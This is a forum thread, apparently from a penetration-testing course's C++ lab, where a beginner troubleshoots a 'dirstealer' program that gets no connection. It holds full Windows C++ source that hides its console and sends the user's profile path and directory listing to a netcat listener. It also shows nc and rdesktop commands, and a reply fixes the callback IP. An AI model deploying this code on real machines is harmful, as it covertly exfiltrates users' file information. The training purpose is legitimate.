Can't receive dirstealer or keylogger info after listening on C++ Labs

Hi guys,

I’m stuck on the C++ labs. I’ve tried lots of things but no success.

I compiled both the C++ code on the victim machine and it produced the exe files. I tried using netcat as such:

```
nc -lvp [port number]
listening on [any] [port number] …
```

I used the port number that was shown for making the connection via rdesktop.

When I try to execute the code on the victim’s computer I get no response from the terminal on Kali.

The same issue with the keylogger exe file.

I used the previously made CPP files on the victim’s computer to make the exe files.

Am I doing something wrong? Any suggestions? I would gladly appreciate your help as I am new to penetration testing.

you may provide the actual commands you used and the source code in order to help specifically

I signed in as Kali, not root.

I connected via rdesktop:

```
sudo rdesktop 172.16.160.155:65520
```

With the dirstealer cpp file I used this source code that was pre-made and I changed the IP address and port number:

```cpp
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#pragma comment(lib, "Ws2_32.lib")
#include
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include

char* userDirectory()
{
    char* pPath;
    pPath = getenv("USERPROFILE");
    if (pPath != NULL)
    {
        //printf("%s\n", pPath);
        return pPath;
    } else {
        perror("");
    } //otherwise exit
}

int main()
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    WSADATA WSAData;
    SOCKET server;
    SOCKADDR_IN addr;

    WSAStartup(MAKEWORD(2, 0), &WSAData);
    server = socket(AF_INET, SOCK_STREAM, 0);
    addr.sin_addr.s_addr = inet_addr("172.16.160.155"); // your listening IP
    addr.sin_family = AF_INET;
    addr.sin_port = htons(65520); //your listening port
    connect(server, (SOCKADDR *)&addr, sizeof(addr));

    //printf("conntected");

    char* pPath = userDirectory();
    send(server, pPath, sizeof(pPath), 0);

    DIR *dir;
    struct dirent *ent;
    if ((dir = opendir(pPath)) != NULL) {
        /* print all the files and directories within directory */
        while ((ent = readdir(dir)) != NULL) {
            send(server, ent->d_name, sizeof(ent->d_name), 0);
        }
        closedir(dir);
    } else {
        /* could not open directory */
        perror("");
    }
    ////clean up
    closesocket(server);
    WSACleanup();

}
```

Then I tried to use netcat:

```
┌──(kali㉿kali)-[~]
└─$ nc -lvp 65520
listening on [any] 65520 …
```

I went back to the victim’s machine and double clicked the exe file. Nothing happens. I click run in dev++ nothing happens. I don’t know what I’m doing wrong.

well, that's the victim's address, isn't it?

yes. wasn’t sure if I was supposed to use that address or mine. ifconfig to find mine, right? under tap0?

yeah, well you want to connect to your listener, right? so you need the address of the listener - which is probably your tap0, right

please properly format code listings by using ```
but yes, when your listener received the dir listing, it seems to work as expected

Good, thanks. Total newbie to this penetration testing so thanks for your help.